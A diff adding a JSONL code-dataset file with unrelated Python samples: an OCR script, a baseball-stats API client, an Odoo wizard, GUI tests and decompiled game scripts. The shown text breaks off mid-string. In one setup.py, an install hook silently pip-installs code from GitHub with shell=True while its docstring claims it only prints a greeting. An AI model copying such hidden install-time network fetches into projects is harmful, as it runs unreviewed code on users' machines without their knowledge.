diff --git "a/2376.jsonl" "b/2376.jsonl" new file mode 100644--- /dev/null +++ "b/2376.jsonl" @@ -0,0 +1,629 @@ +{"seq_id":"569044274","text":"from setuptools import setup\nfrom setuptools.command.install import install\nimport sys\nimport subprocess\n\n\nclass PrecommitInstallCommand(install):\n \"\"\"Customized setuptools install command - prints a friendly greeting.\"\"\"\n def run(self):\n subprocess.call('pip install git+https://github.com/PyCQA/astroid git+https://github.com/PyCQA/pylint', shell=True)\n super().run()\n\n\nsetup(\n name='pre_commit_dummy_package',\n version='0.0.0',\n cmdclass={\n 'install': PrecommitInstallCommand,\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"565735500","text":"#!/usr/bin/env python\nimport sys\n\nlink_counts = {}\n\nfor line in sys.stdin:\n link, count = line.strip().split('\\t')\n link_counts[link] = int(count)\n\nresult = {}\nfor k1, v1 in link_counts.items():\n rank = 0\n for k2, v2 in link_counts.items():\n if v1 > v2:\n rank += 1\n result[k1] = rank\n \nfor link, count in sorted(result.items(), reverse=True):\n print('%s\\t%s' % (link, count))\n","sub_path":"PopularityLeagueReducer.py","file_name":"PopularityLeagueReducer.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"116895413","text":"useFixture(RecordEditor)\r\n\r\ndef test():\r\n\tfrom Modules import commonBits\r\n\r\n\tjava_recorded_version = '1.6.0_03'\r\n\r\n\tif window('Record Editor'):\r\n\t\tclick(commonBits.fl('Choose File'))\r\n\r\n\t\tif window('Open'):\r\n\t\t\tselect(commonBits.selectPane(), 'Ams_LocDownload_20041228.txt')\r\n\t\t\tclick('Open')\r\n\t\tclose()\r\n\r\n\t\tcommonBits.setRecordLayout(select, 'ams Store')\r\n\r\n\t\tclick(commonBits.fl('Edit') + '1')\r\n##\t\tselect('Table', 'rows:[0,1,2,3,4,5],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tselect('Table', 'rows:[0,1,2,3,4,5],columns:[8 - 2|Loc Type]')\r\n\t\tselect_menu(commonBits.fl('View') + '>>' + commonBits.fl('Column View #{Selected Records#}'))\r\n##\t\tselect('Table2', 'rows:[0,1,2,3,4,5],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tselect('Table', 'cell:Row 1,0(TAR)')\r\n\t\tassert_p('Table1', 'Text', '3', commonBits.fl('Len') + ',0')\r\n\t\tselect('Table', 'cell:Row 1,1(5839)')\r\n\t\tassert_p('Table', 'Content', '[[TAR, TAR, TAR, TAR, TAR, TAR], [5839, 5850, 5853, 5866, 5015, 5019], [DC, DC, DC, DC, ST, ST], [DC - Taras Ave, VIC West Ad Support, NSW North Sydney Ad Support, WA Ad Support, Bankstown, Penrith], [, , , , Bankstown, Penrith], [30-68 Taras Ave, Lot 2 Little Boundary Rd, , , Unit 2, 39-41 Allingham Street, 58 Leland Street], [Altona North, Laverton, , , Condell Park, Penrith], [3025, 3028, , , 2200, 2750], [VIC, VIC, , , NSW, NSW], [A, A, A, A, A, A]]')\r\n\t\tselect('Table', 'cell:Row 1,1(5839)')\r\n\t\tcommonBits.closeWindow(click)\r\n\t\t##click('BasicInternalFrameTitlePane$NoFocusButton2')\r\n\t\tselect('Table', 'rows:[0,1,2,3,4,5],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tselect('Table', 'rows:[8,11,15],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tcommonBits.closeWindow(click)\r\n\t\t##click('BasicInternalFrameTitlePane$NoFocusButton2')\r\n\tclose()\r\n","sub_path":"Build/Instalation/GeneralDb/Marathon/MarathonTests_1.1/LargeFile_Edit/TestCases/View/ColumnView1.py","file_name":"ColumnView1.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"186144693","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\holidays\\holiday_service.py\n# Compiled at: 2020-01-28 20:39:21\n# Size of source mod 2**32: 18206 bytes\nfrom _collections import defaultdict\nfrom protocolbuffers import GameplaySaveData_pb2\nfrom date_and_time import DAYS_PER_WEEK, create_time_span, DATE_AND_TIME_ZERO\nfrom distributor.rollback import ProtocolBufferRollback\nfrom distributor.system import Distributor\nfrom drama_scheduler.drama_node_types import DramaNodeType\nfrom event_testing.resolver import DataResolver\nfrom holidays.custom_holiday import CustomHoliday\nfrom holidays.holiday_ops import SendHolidayInfo\nfrom id_generator import generate_object_id\nfrom seasons.seasons_enums import SeasonLength, SeasonType\nfrom seasons.seasons_tuning import SeasonsTuning\nfrom sims4.common import Pack\nfrom sims4.service_manager import Service\nfrom sims4.tuning.tunable import TunablePackSafeReference\nfrom sims4.utils import classproperty\nimport persistence_error_types, services, sims4.log\nlogger = sims4.log.Logger('Holiday', default_owner='jjacobson')\n\nclass YearOfHolidays:\n\n def __init__(self, season_length):\n self._season_length = season_length\n self._holidays = defaultdict(dict)\n\n def holidays_to_schedule_gen(self):\n for season, season_data in self._holidays.items():\n for day, holiday_id in season_data.items():\n yield (\n season, day, holiday_id)\n\n def get_holiday_data(self, holiday_id_for_data):\n for season, day, holiday_id in self.holidays_to_schedule_gen():\n if holiday_id == holiday_id_for_data:\n return (\n season, day)\n\n return (None, None)\n\n def add_holiday(self, season, day, holiday_id):\n season_length = int(SeasonsTuning.SEASON_LENGTH_OPTIONS[self._season_length]().in_days())\n if day > season_length:\n day_in_week = day % DAYS_PER_WEEK\n day = day_in_week + season_length - DAYS_PER_WEEK\n if day in self._holidays[season]:\n return\n self._holidays[season][day] = holiday_id\n\n def remove_holiday(self, holiday_id_to_remove):\n for holidays in tuple(self._holidays.values()):\n for day, holiday_id in tuple(holidays.items()):\n if holiday_id == holiday_id_to_remove:\n del holidays[day]\n return\n\n def save(self, msg):\n msg.season_length = self._season_length\n for season, season_map in self._holidays.items():\n for day, holiday_id in season_map.items():\n with ProtocolBufferRollback(msg.holidays) as (holiday_time_msg):\n holiday_time_msg.holiday_id = holiday_id\n holiday_time_msg.day = day\n holiday_time_msg.season = season\n\n def load(self, msg):\n for holiday_time_data in msg.holidays:\n season = SeasonType(holiday_time_data.season)\n self._holidays[season][holiday_time_data.day] = holiday_time_data.holiday_id\n\n\nclass HolidayService(Service):\n CUSTOM_HOLIDAY_DRAMA_NODE = TunablePackSafeReference(description='\\n The drama node to construct to run a custom holiday.\\n ',\n manager=(services.get_instance_manager(sims4.resources.Types.DRAMA_NODE)))\n\n def __init__(self):\n self._holidays = {}\n self._holiday_times = {}\n\n @classproperty\n def required_packs(cls):\n return (\n Pack.EP05,)\n\n @classproperty\n def save_error_code(cls):\n return persistence_error_types.ErrorCodes.SERVICE_SAVE_FAILED_HOLIDAY_SERVICE\n\n def _schedule_holiday(self, holiday_id):\n resolver = DataResolver(None)\n season_service = services.season_service()\n current_season_length = season_service.season_length_option\n drama_scheduler = services.drama_scheduler_service()\n season, day = self._holiday_times[current_season_length].get_holiday_data(holiday_id)\n if season is None:\n logger.error('Trying to schedule holiday of id {} which is not actually scheduled to run at any time.')\n return\n for season_type, season_content in season_service.get_seasons_for_scheduling():\n if season_type != season:\n continue\n holiday_start_time = season_content.start_time + create_time_span(days=day)\n drama_scheduler.schedule_node((HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE), resolver, specific_time=holiday_start_time, holiday_id=holiday_id)\n\n def _schedule_all_holidays(self, holiday_ids_to_ignore=()):\n resolver = DataResolver(None)\n season_service = services.season_service()\n current_season_length = season_service.season_length_option\n drama_scheduler = services.drama_scheduler_service()\n season_data = defaultdict(list)\n for season_type, season_content in season_service.get_seasons_for_scheduling():\n season_data[season_type].append(season_content)\n\n for season, day, holiday_id in self._holiday_times[current_season_length].holidays_to_schedule_gen():\n if holiday_id in holiday_ids_to_ignore:\n continue\n for season_content in season_data[season]:\n holiday_start_time = season_content.start_time + create_time_span(days=day)\n drama_scheduler.schedule_node((HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE), resolver, specific_time=holiday_start_time, holiday_id=holiday_id)\n\n def on_season_content_changed(self):\n drama_scheduler = services.drama_scheduler_service()\n drama_scheduler.cancel_scheduled_nodes_with_types((HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE,))\n for drama_node in tuple(drama_scheduler.get_running_nodes_by_class(HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE)):\n if drama_node.is_running:\n continue\n drama_scheduler.complete_node(drama_node.uid)\n\n self._schedule_all_holidays()\n holidays = {}\n for drama_node in tuple(drama_scheduler.scheduled_nodes_gen()):\n if drama_node.drama_node_type != DramaNodeType.HOLIDAY:\n continue\n day = drama_node.day\n existing_node = holidays.get(day)\n if existing_node is None:\n holidays[day] = drama_node\n continue\n if type(existing_node) is HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE:\n drama_scheduler.cancel_scheduled_node(drama_node.uid)\n else:\n drama_scheduler.cancel_scheduled_node(existing_node.uid)\n holidays[day] = drama_node\n\n def on_all_households_and_sim_infos_loaded(self, client):\n holiday_ids_to_ignore = {drama_node.holiday_id for drama_node in services.drama_scheduler_service().all_nodes_gen() if type(drama_node) is HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE if type(drama_node) is HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE}\n if not self._holiday_times:\n for season_length in SeasonLength:\n self._holiday_times[season_length] = YearOfHolidays(season_length)\n\n for season_type, season_content in services.season_service().get_four_seasons():\n for season_length, holiday, day_of_season in season_content.get_all_holiday_data():\n self._holiday_times[season_length].add_holiday(season_type, day_of_season, holiday.guid64)\n\n self._schedule_all_holidays(holiday_ids_to_ignore)\n\n def add_a_holiday(self, holiday_proto, season, day):\n holiday_id = generate_object_id()\n new_holiday = CustomHoliday(holiday_id, None)\n self._holidays[holiday_id] = new_holiday\n new_holiday.load_holiday(holiday_proto)\n for holiday_time in self._holiday_times.values():\n holiday_time.add_holiday(season, day, holiday_id)\n\n self._schedule_holiday(holiday_id)\n\n def remove_a_holiday(self, holiday_id):\n drama_scheduler_service = services.drama_scheduler_service()\n for drama_node in tuple(drama_scheduler_service.scheduled_nodes_gen()):\n if drama_node.drama_node_type != DramaNodeType.HOLIDAY:\n continue\n if drama_node.holiday_id != holiday_id:\n continue\n drama_scheduler_service.cancel_scheduled_node(drama_node.uid)\n\n for drama_node in tuple(drama_scheduler_service.active_nodes_gen()):\n if drama_node.drama_node_type != DramaNodeType.HOLIDAY:\n continue\n if drama_node.holiday_id != holiday_id:\n continue\n drama_scheduler_service.complete_node(drama_node.uid)\n\n for holiday_year_data in self._holiday_times.values():\n holiday_year_data.remove_holiday(holiday_id)\n\n if holiday_id in self._holidays:\n del self._holidays[holiday_id]\n\n def is_valid_holiday_id(self, holiday_id):\n return self._get_holiday_data(holiday_id) is not None\n\n def _get_holiday_data(self, holiday_id):\n holiday_data = self._holidays.get(holiday_id)\n if holiday_data is None:\n holiday_data = services.get_instance_manager(sims4.resources.Types.HOLIDAY_DEFINITION).get(holiday_id)\n return holiday_data\n\n def get_holiday_traditions(self, holiday_id):\n return self._get_holiday_data(holiday_id).traditions\n\n def get_holiday_display_name(self, holiday_id):\n return self._get_holiday_data(holiday_id).display_name\n\n def get_holiday_display_icon(self, holiday_id):\n return self._get_holiday_data(holiday_id).display_icon\n\n def get_holiday_time_off_work(self, holiday_id):\n return self._get_holiday_data(holiday_id).time_off_work\n\n def get_holiday_time_off_school(self, holiday_id):\n return self._get_holiday_data(holiday_id).time_off_school\n\n def get_holiday_calendar_alert_notification(self, holiday_id):\n return self._get_holiday_data(holiday_id).calendar_alert_description\n\n def get_decoration_preset(self, holiday_id):\n return self._get_holiday_data(holiday_id).decoration_preset\n\n def get_holiday_audio_sting(self, holiday_id):\n return self._get_holiday_data(holiday_id).audio_sting\n\n def can_holiday_be_modified(self, holiday_id):\n return self._get_holiday_data(holiday_id).can_be_modified\n\n def send_holiday_info_message(self, holiday_id):\n holiday_data = self._get_holiday_data(holiday_id)\n send_holiday_info = SendHolidayInfo(holiday_id, holiday_data.display_name, holiday_data.display_icon, holiday_data.time_off_work, holiday_data.time_off_school, holiday_data.traditions, holiday_data.can_be_modified, holiday_data.decoration_preset)\n distributor = Distributor.instance()\n distributor.add_op_with_no_owner(send_holiday_info)\n\n def save(self, save_slot_data=None, **kwargs):\n holiday_service_proto = GameplaySaveData_pb2.PersistableHolidayService()\n for custom_holiday in self._holidays.values():\n with ProtocolBufferRollback(holiday_service_proto.holidays) as (holiday_data):\n custom_holiday.save_holiday(holiday_data)\n\n for calendar in self._holiday_times.values():\n with ProtocolBufferRollback(holiday_service_proto.calendars) as (calendar_msg):\n calendar.save(calendar_msg)\n\n save_slot_data.gameplay_data.holiday_service = holiday_service_proto\n\n def load(self, zone_data=None):\n save_slot_data = services.get_persistence_service().get_save_slot_proto_buff()\n msg = save_slot_data.gameplay_data.holiday_service\n holiday_manager = services.get_instance_manager(sims4.resources.Types.HOLIDAY_DEFINITION)\n for custom_holiday_msg in msg.holidays:\n holiday_type = holiday_manager.get(custom_holiday_msg.holiday_type)\n custom_holiday = CustomHoliday(custom_holiday_msg.holiday_type, holiday_type)\n custom_holiday.load_holiday(custom_holiday_msg)\n self._holidays[custom_holiday.holiday_id] = custom_holiday\n\n for holiday_calendar in msg.calendars:\n calendar_length = SeasonLength(holiday_calendar.season_length)\n self._holiday_times[calendar_length] = YearOfHolidays(calendar_length)\n self._holiday_times[calendar_length].load(holiday_calendar)\n\n def modify_holiday(self, holiday_proto):\n holiday_id = holiday_proto.holiday_type\n current_traditions = set(self.get_holiday_traditions(holiday_id))\n previous_preset = self.get_decoration_preset(holiday_id)\n if holiday_id not in self._holidays:\n holiday_manager = services.get_instance_manager(sims4.resources.Types.HOLIDAY_DEFINITION)\n holiday_type = holiday_manager.get(holiday_id)\n self._holidays[holiday_id] = CustomHoliday(holiday_id, holiday_type)\n self._holidays[holiday_id].load_holiday(holiday_proto)\n ordered_traditions = self.get_holiday_traditions(holiday_id)\n new_traditions = set(ordered_traditions)\n added_traditions = new_traditions.difference(current_traditions)\n removed_traditions = current_traditions.difference(new_traditions)\n active_household = services.active_household()\n if active_household is None:\n return\n active_household.holiday_tracker.on_holiday_modified(holiday_id, added_traditions, removed_traditions, ordered_traditions, previous_preset is not self.get_decoration_preset(holiday_id))","sub_path":"Scripts/simulation/holidays/holiday_service.py","file_name":"holiday_service.py","file_ext":"py","file_size_in_byte":13607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414365663","text":"from urllib2 import urlopen\nfrom urllib import quote\nfrom datetime import datetime\nfrom json import loads\nfrom ysportsapi import ysportsapi\n\nclass milbapi:\n def __init__(self):\n self.url_base = \"http://www.milb.com/lookup/json/named.\"\n\n def request(self, playerID=None, playerName=None, teamID=None, \n system=None, staff=None, stats=None, stats_type=None, last10=None,\n schedule=None, season=None):\n req_url = self.url_base\n\n if season is None:\n season=str(datetime.today().year)\n\n if playerName is not None:\n req_url += \"milb_player_search.bam?name_part=\" + \\\n quote(\"\\'%s\\'\" % playerName)\n elif playerID is not None:\n if stats is None:\n req_url += \"player.bam?player_id=\" + playerID\n elif stats_type is None:\n req_url += \"player_has_stats_year.bam?player_id=\" + playerID + \\\n \"&league_list_id=%27mlb_milb%27\"\n else:\n if stats_type=='H':\n req_url += \"&league_list_id=%27mlb_milb%27\"\n \"sport_hitting_composed.bam?game_type=%27R%27&\" + \\\n \"league_list_id=%27mlb_milb%27& + \\player_id=\" + \\\n playerID + \"&sport_hitting_composed.season=\" + season\n else:\n req_url += \"player_has_stats_year.bam?player_id=\" \\\n + playerID + \"&league_list_id=%27mlb_milb%27\"\n elif last10 is not None:\n #FAR FROM COMPLETE\n req_url += \"player_has_stats_year.bam?player_id=\" + playerID + \\\n \"&league_list_id=%27mlb_milb%27\"\n elif teamID is not None:\n if staff is not None:\n req_url += \"roster_active_staff.bam?team_id=\" + teamID\n elif schedule is not None:\n req_url += \"schedule_team_complete.bam?season=\" + season + \\\n \"&team_id=\" + teamID #+ \"&start_date=%27\" + season + \\\n #\"%2F01%2F01%27&end_date=%27\" + season + \"%2F12%2F31%27\"\n else:\n req_url += \"roster_all.bam?team_id=\" + teamID\n elif system is not None:\n req_url += \"milb_standings_display_flip.bam?season=\" + season\n\n ret_json = loads(urlopen(req_url).read())\n \n return ret_json\n\n def get_profile(self, playerID):\n prof = self.request(playerID=playerID)['player']['queryResults']['row']\n\n if prof['pro_debut_date'] != \"\":\n debut = datetime.strptime(prof['pro_debut_date'][0:10], \"%Y-%m-%d\")\n else:\n debut = None\n\n ret_profile = {\n \"name\" : prof['name_first_last'],\n \"name_middle\" : prof['name_middle'],\n \"name_matrilineal\" : prof['name_matrilineal'],\n \"pos\" : prof['primary_position_txt'],\n \"born\" : datetime.strptime(prof['birth_date'][0:10], \"%Y-%m-%d\"),\n \"birthplace\" : prof['birth_city'] + ', ' + prof['birth_country'],\n \"birth_st\" : prof['birth_state'],\n \"bats\" : prof['bats'],\n \"throws\" : prof['throws'],\n \"height\" : prof['height_feet'] + '-' + prof['height_inches'], \n \"weight\" : prof['weight'],\n \"drafted\" : prof['draft_year'] + ' ' + prof['draft_round'] + \\\n ' ' + prof['draft_team_abbrev'],\n \"college\" : prof['college'],\n \"nickname\" : prof['name_nick'],\n \"twitter\" : prof['twitter_id'],\n \"highschool\" : prof['high_school'],\n \"pro_debut\" : debut}\n\n return ret_profile\n\n def match_yahoo_player(self, yahooID):\n y = ysportsapi().get_profile(yahooID)\n\n results = self.request(playerName=y['name'])\\\n ['milb_player_search']['queryResults']['row']\n\n if isinstance(results, list):\n for i in results:\n if y['born'] == \\\n datetime.strptime(i['player_birth_date'][0:10], \"%Y-%m-%d\"):\n p_id = i['player_id']\n else:\n p_id = results['player_id']\n\n return p_id\n\n def get_system(self, org=None):\n raw_sys_data = self.request(system=True)['milb_standings_display_flip']\n raw_system = raw_sys_data['org_history']['queryResults']['row']\n\n ret_system=[]\n for i in raw_system:\n ret_system.append({'name' : i['name_full'],\n 'id' : i['organization_id'],\n 'abbrev' : i['name_abbrev'],\n 'org_code' : i['org_code'],\n 'parent_org' : i['parent_org'],\n 'type' : i['org_type']})\n\n if org is not None:\n ret_org = get_child_orgs(ret_system, org)\n return ret_org\n\n else:\n return ret_system\n\n def get_teams(self):\n raw_sys_data = self.request(system=True)['milb_standings_display_flip']\n raw_teams = raw_sys_data['team_all_season']['queryResults']['row']\n\n ret_teams=[]\n for i in raw_teams:\n if 'mlb_org_id' in i and i['mlb_org_id'] != '':\n #if i['sport_code'] == 'mlb' and i['city'] != '': #and \\\n #i['all_star_sw'] == 'N' or i['mlb_org_id'] != '':\n ret_teams.append({'code' : i['sport_code'],\n 'id' : i['team_id'],\n 'abbrev' : i['name_abbrev'],\n 'city' : i['city'],\n 'name' : i['name'],\n 'full_name' : i['name_display_long'],\n 'league_id' : i['league_id'],\n 'state' : i['state'],\n 'venue_id' : i['venue_id'],\n 'venue_name' : i['venue_name'],\n 'org' : i['mlb_org'],\n 'org_id' : i['mlb_org_id']})\n\n return ret_teams\n\n def get_roster(self, teamID, status='Full'):\n raw_roster = self.request(teamID=teamID)\n roster = raw_roster['roster_all']['queryResults']['row']\n \n ret_roster = []\n for i in roster:\n ros_spot = {\n \"player_id\" : i['player_id'],\n \"first_name\" : i['name_first'],\n \"last_name\" : i['name_last'],\n \"disp_name\" : i['name_display_first_last'],\n \"pos\" : i['position'],\n \"num\" : i['jersey_number'],\n \"bats\" : i['bats'],\n \"throws\" : i['throws'],\n \"status\" : i['status_short'],\n \n \"born\" : datetime.strptime(i['birth_date'][0:10], \\\n \"%Y-%m-%d\"),\n \"debut\" : datetime.strptime(i['start_date'][0:10], \"%Y-%m-%d\")}\n\n if status == 'Active':\n if i['status_code'] == 'A':\n ret_roster.append(ros_spot)\n elif status == 'DL':\n if i['status_code'][0] == 'D':\n ret_roster.append(ros_spot)\n elif status == 'Position':\n if i['status_code'] == 'A' and i['primary_position'] != '1':\n ret_roster.append(ros_spot)\n elif status == 'Pitching':\n if i['status_code'] == 'A' and i['primary_position'] == '1':\n ret_roster.append(ros_spot)\n else:\n ret_roster.append(ros_spot)\n \n return ret_roster\n\n def get_staff(self, teamID):\n raw_staff = self.request(teamID=teamID, staff=True)\n staff = raw_staff['roster_active_staff']['queryResults']['row']\n\n ret_staff = []\n for i in staff:\n staffer = {\n \"player_id\" : i['player_id'],\n \"first_name\" : i['name_first'],\n \"last_name\" : i['name_last'],\n \"job\" : i['job'],\n \"num\" : i['jersey_number'],\n \"bats\" : i['bats'],\n \"throws\" : i['throws'],\n \"debut\" : datetime.strptime(i['start_date'][0:10], \"%Y-%m-%d\")}\n\n ret_staff.append(staffer)\n\n return ret_staff\n\n def get_schedule(self, teamID, season=None):\n if season is None:\n raw_schedule = self.request(teamID=teamID, schedule=True)\n else:\n raw_schedule = self.request(teamID=teamID, schedule=True, \\\n season=season)\n schedule = raw_schedule['schedule_team_complete']['queryResults']['row']\n\n ret_schedule = []\n for i in schedule:\n game = {\n \"team_id\" : i['team_id'],\n \"team_lg\" : i['league_id'],\n \"team_tz\" : i['team_time_zone'],\n \"opp_id\" : i['opponent_id'],\n \"opp_lg\" : i['opponent_league_id'],\n \"opp_tz\" : i['opponent_time_zone'],\n \"venue\" : i['venue_name'],\n \"loc\" : i['venue_city'] + ', ' + i['venue_twc_loc'][2:4],\n \"loc_tz\" : i['time_zone_local'],\n \"home_away\" : i['home_away_sw'],\n \"double_header\" : i['double_header_sw'],\n \"game_num\" : i['game_nbr'],\n \"gametime\" : datetime.strptime(i['game_time_et'],\n '%Y-%m-%dT%H:%M:%S')}\n\n ret_schedule.append(game)\n\n return ret_schedule\n\n def get_child_orgs(system, top_org):\n ret_orgs = []\n for i in system:\n if i['id'] == top_org:\n ret_orgs.append(i)\n elif 'parent_org' in i and i['parent_org'] == top_org:\n ret_orgs.append(get_child_orgs(system, i['id']))\n return ret_orgs\n","sub_path":"plod_api/milbapi.py","file_name":"milbapi.py","file_ext":"py","file_size_in_byte":9456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"374026874","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# For copyright and license notices, see __openerp__.py file in module root\n# directory\n##############################################################################\nimport datetime\nimport calendar\nimport base64\nimport re\nfrom dateutil.relativedelta import relativedelta\nfrom odoo import api, fields, models\n\n\nclass account_cxc_chq_wizard(models.TransientModel):\n _name = 'account.cxc.chq.wizard'\n _description = 'Summary of composition of sales balances'\n\n date = fields.Date(\n 'Date', default=fields.Date.context_today)\n\n company_id = fields.Many2one(\n 'res.company',\n 'Company',\n default=lambda self: self.env.user.company_id,\n )\n customer_id = fields.Many2one(\n 'res.partner',\n string='Partner',\n domain=[('customer', '=', True)]\n )\n supplier_id = fields.Many2one(\n 'res.partner',\n string='Partner',\n domain=[('supplier', '=', True)]\n )\n days_check_endorsed = fields.Integer(\n 'Days of old endorsed checks', default=30\n )\n days_check_deposited = fields.Integer(\n 'Days of old deposited checks', default=5\n )\n type = fields.Selection([\n ('sale','Sale'),\n ('purchase','Purchase')],\n string=\"Type\")\n\n def print_report(self):\n data = {'ids': self.env.context.get('active_ids', [])}\n res = self.read()\n res = res and res[0] or {}\n data.update({'form': res})\n if self.type == 'sale':\n res = self.read(['date', 'company_id', 'days_check_endorsed','days_check_deposited', 'customer_id'])\n res = res and res[0] or {}\n data.update({'form': res})\n return self.env.ref('l10n_ar_report.report_account_cxc_chq').report_action([], data=data)\n # return self.env['report'].get_action(self,'l10n_ar_report.report_account_cxc_check', data=data)\n else:\n res = self.read(['date', 'company_id', 'days_check_endorsed','days_check_deposited', 'supplier_id'])\n res = res and res[0] or {}\n data.update({'form': res})\n return self.env.ref('l10n_ar_report.report_account_cxp_chq').report_action([], data=data)\n # return self.env['report'].get_action(self,'l10n_ar_report.report_account_cxp_check', data=data)\n","sub_path":"l10n_ar_report/wizards/account_cxc_chq_wizard.py","file_name":"account_cxc_chq_wizard.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"403046402","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\nimport pytesseract\r\n#pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe'\r\n\r\ndef LPRmain(fileName = '1', imgShow = True):\r\n img = cv2.imread('spz\\\\'+str(fileName)+'.jpg') #(,cv2.IMREAD_COLOR)\r\n \"\"\"\r\n Definování cesty k obrázku\r\n \"\"\" \r\n\r\n img = cv2.resize(img, (600,400) )\r\n \"\"\"\r\n Změna velikosti a uložení do proměnné img\r\n Změnou velikosti zabráníme problémům s velkým rozlišením fotografií\r\n \"\"\"\r\n\r\n #cv2.imshow('Orig',img)\t#kontrola \r\n \"\"\"\r\n Zobrazení obrázku v okně\r\n \"\"\"\r\n\r\n\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \r\n \"\"\"\r\n Převedení obrázku do odstínů šedé\r\n Obrázek v odstíněch šedé zrychlí další kroky\r\n \"\"\"\r\n\r\n gray = cv2.bilateralFilter(gray, 13, 15, 15) \t\t\r\n \"\"\"\r\n Zbavení se šumu a nedostatků fotky\r\n Můžeme nastavovat 2 poslední parametry od 15 výš - podle toho se rozmaže pozadí\r\n \"\"\"\r\n\r\n #cv2.imshow('Gray',gray)\t#kontrola\r\n\r\n\r\n edged = cv2.Canny(gray, 30, 220) \t\t\t\t\r\n \"\"\"\r\n Vykreslení hran na obrázku\r\n\r\n Args:\r\n (int): minimum a maximum \r\n hrany které mají \"intensity gradient\" mezi těmito\r\n hodnotami se vykreslí\r\n \"\"\"\r\n\r\n if(imgShow): cv2.imshow('hrany',edged)\t#kontrola\r\n\r\n\r\n ##### hledaní spojených hran #####\r\n\r\n contours = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) #cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n \"\"\"\r\n Najdeme uzavřené obrysy, abychom lépe detekovali všechny obdélníky na obrázku\r\n a z nich vybrali SPZ\r\n \"\"\"\r\n\r\n #print(contours)\t#kontrola listu\r\n\r\n contours = imutils.grab_contours(contours)\r\n \"\"\"\r\n Obrysy uchováme\r\n \"\"\"\r\n\r\n contours = sorted(contours, key = cv2.contourArea, reverse = True)[:10]\t\r\n \"\"\"\r\n Uspořádáme od největšího a uchováme prvních 10 prvků\r\n \"\"\"\r\n\r\n #print(contours)\t#kontrola listu\r\n\r\n screenCnt = None\r\n\r\n for c in contours:\r\n \"\"\"\r\n Projdeme všechny obrysy a najdeme takový, který má tvar obdélníku,\r\n čtyři strany a je uzavřený.\r\n \"\"\"\r\n peri = cv2.arcLength(c, True)\t\t\t\r\n approx = cv2.approxPolyDP(c, 0.018 * peri, True)\r\n \r\n if len(approx) == 4:\t #Pokud má přibližný obrys 4 body předpokládáme, že jsme našli SPZ a uložíme do screenCnt\r\n screenCnt = approx\r\n break\r\n\r\n if screenCnt is None:\t\t #Pokud není nalezen obrys se 4 body\r\n detected = 0\r\n print (\"No contour detected\")\r\n else:\r\n detected = 1\r\n\r\n if detected == 1:\t\t\t #Vykreslíme okolo nalezeného obrysu obdelník, pro ujištění se že je to SPZ \r\n cv2.drawContours(img, [screenCnt], -1, (0, 0, 255), 3)\r\n \"\"\"\r\n Okolo nalezeného obdélníku vykreslíme červený tvar\r\n \"\"\"\r\n\r\n ##### Vytvoření masky okolo nalezené SPZ #####\r\n maska = np.zeros(gray.shape,np.uint8)\t\r\n new_image = cv2.drawContours(maska,[screenCnt],0,255,-1,)\r\n new_image = cv2.bitwise_and(img,img,mask=maska)\r\n \"\"\"\r\n Vytvoříme masku okolo nalezené SPZ a zbytek obrázku odstraníme\r\n \"\"\"\r\n\r\n #cv2.imshow('maska',new_image)\t#kontrola\r\n\r\n ##### Oriznuti obrazku, kde je maska #####\r\n (x, y) = np.where(maska == 255)\t\r\n (topx, topy) = (np.min(x), np.min(y))\r\n (bottomx, bottomy) = (np.max(x), np.max(y))\r\n Cropped = gray[topx:bottomx+1, topy:bottomy+1]\r\n \"\"\"\r\n Ořízneme obrázek, pomocí masky\r\n \"\"\"\r\n\r\n #cv2.imshow('oriznute',Cropped)\t#kontrola\r\n\r\n\r\n ##### Cteni textu z vysledneho obrazku #####\r\n\r\n #print(pytesseract.get_languages(config=''))\t #kontrola dostupnych nastaveni teseracu (lang=...)\r\n\r\n text = pytesseract.image_to_string(Cropped, lang='eng', config='--psm 10 -c tessedit_char_whitelist=ABCDEFHIJKLMNPRSTUVXYZ0123456789') #config --psm10 je single character recognition (moznosti nastaveni --psm lze najit napsanim do konzole \"tesseract --help-psm\") mozno dodat --oem 1 (Neural Nets) \r\n \"\"\"\r\n Použijeme tesseract na přečtení textu z obrázku\r\n\r\n Args:\r\n lang (str): jazyk\r\n config (str): --psm10 je single character recognization\r\n -c tessedit_char_whitelist je whitelist znaků, které může obsahovat\r\n hrany které mají \"intensity gradient\" mezi těmito\r\n hodnotami se vykreslí\r\n \"\"\"\r\n\r\n print(\"License Plate Recognition 